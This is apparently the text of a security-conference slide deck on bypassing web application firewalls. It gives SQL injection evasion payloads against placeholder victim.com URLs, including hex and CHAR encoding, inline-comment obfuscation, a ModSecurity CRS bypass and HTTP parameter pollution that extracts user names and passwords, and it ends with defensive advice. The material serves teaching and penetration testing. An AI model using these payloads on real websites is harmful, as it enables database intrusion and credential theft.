1. Web Application Firewall (WAF)
Suckseed or Succeed !?
Mr.Prathan Phongthiproek
Consulting Manager, Red Team
ACIS Professional Center
2. Who am I ?
ACIS Professional Center
Manager of the Red Team
Specializing in Attack & Penetration
Information Security Consulting Manager
Instructor and Speaker
Founder of CWH Underground Hacker
Aka 0x7a657133756c
3. Let’s Reveal
Introduction to Web Application
Firewall (WAF)
Breach it !!
Filter Evasion
HTTP Parameter Contamination
HTTP Pollution: Split and Join
Conclusion
5. Web Application Hacking
7 of 10 sites are vulnerable
70% of Cyber attacks are on web ports
95% of companies are hacked through
web ports
Anonymous and Lulzsec
Hacker with Operation
#AntiSec
6. Web Application Hacking
Top 3 Web App Attacks
Cross Site Scripting
File Inclusion (Remote/Local)
SQL Injection (Normal/Blind/Time based/Regex...)
8. What’s WAF ?
Emerged from IDS/IPS focused on HTTP
protocol and HTTP related attacks
Usually contain a lot of complex
reg-exp rules to match (Blacklist)
For most WAF vendors they are “Closely
guarded secrets”
Open-source WAFs (Mod_security and
PHPIDS) have open source rules
13. Breach it !! (CMS and WAFs)
“เอาอยู่ เอาอย.......แตกแล้ว”
ู่
14. Filter Evasion (SQLi)
PHP: Magic_quote On,
Mysql_real_escape_string, Addslashes
‘ “ -> ’ ”
id=1 and 1=2 union select 1,group_concat(column_name)
from information_schema.columns where
table_name=‘users’
15. Filter Evasion (SQLi)
PHP: Magic_quote On,
Mysql_real_escape_string, Addslashes
‘ “ -> ’ ”
id=1 and 1=2 union select 1,group_concat(column_name)
from information_schema.columns where
table_name=0x7573657273
16. Filter Evasion (SQLi)
PHP: Magic_quote On,
Mysql_real_escape_string, Addslashes
String to ASCII
id=1 and 1=2 union select 1,load_file(CHAR
(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102
,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
20. Filter Evasion (SQLi)
Inline Comments (/*!......*/)
A lot of WAFs was bypassed
Bypass IPS and Timeout
MySQL Only (http://dev.mysql.com/doc/refman/5.0/en/
comments.html)
/unionsselect/ig
id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)
+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!
TaBlE_sChEMa*/+like+database()--
28. Filter Evasion (SQLi)
Case Study: Mod Security CRS
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect
%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*bar
select#foo
1,2,current_user
0 div 1 union select 1,2,current_user
32. HTTP Parameter Contamination
Case Study: AQTRONIX Webknight
http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om
inform%ation_schema.tables)
10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 and 1=0/(select top 1 table_name from information_schema.tables)
33. HTTP Pollution: Split and Join
HPP is a quite simple but effective hacking
technique
HPP attacks can be defined as the feasibility
to override or add HTTP GET/POST parameters by
injecting query string
Focus on ASP/ASP.net
A lot of WAF was bypassed
37. HTTP Pollution: Split and Join
Basic Attack
Forbidden:http://victim.com/search.aspx?q=select name,password from user
Bypass:http://victim.com/search.aspx?q=select name&q=password from user
q=select name
q=password from user
q=select name,password from user
38. HTTP Pollution: Split and Join
HPP+Inline Comment (Bypass Commercial WAF)
Forbidden:http://victim.com/search.aspx?q=select name,password from user
Bypass:http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/
from/*&q=*/user
q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/user
q=select/*,*/name,password/*,*/from/*,*/user
q=select name,password from user
42. How to protect your website ?
Implement Secure Software Development Life
Cycle (SSDLC)
Secure Coding: Validate all inputs and outputs
Pentest before Online
Harden it !!
Re-visit Again
Deploy WAF (Optional)
43. Conclusion
WAF is not the long-expected
It’s functional limitations, WAF is not able to protect a
web app from all possible vulnerabilities
It’s necessary to adapt WAF filter to the particular web
app being protected
WAF doesn’t eliminate a vulnerability, It just partly
screens the attack vector
It suckseed or succeed !?
“Security Products not able to 100% protect from damn config/coding
of admin. Just need a time and imagination for breach it !!”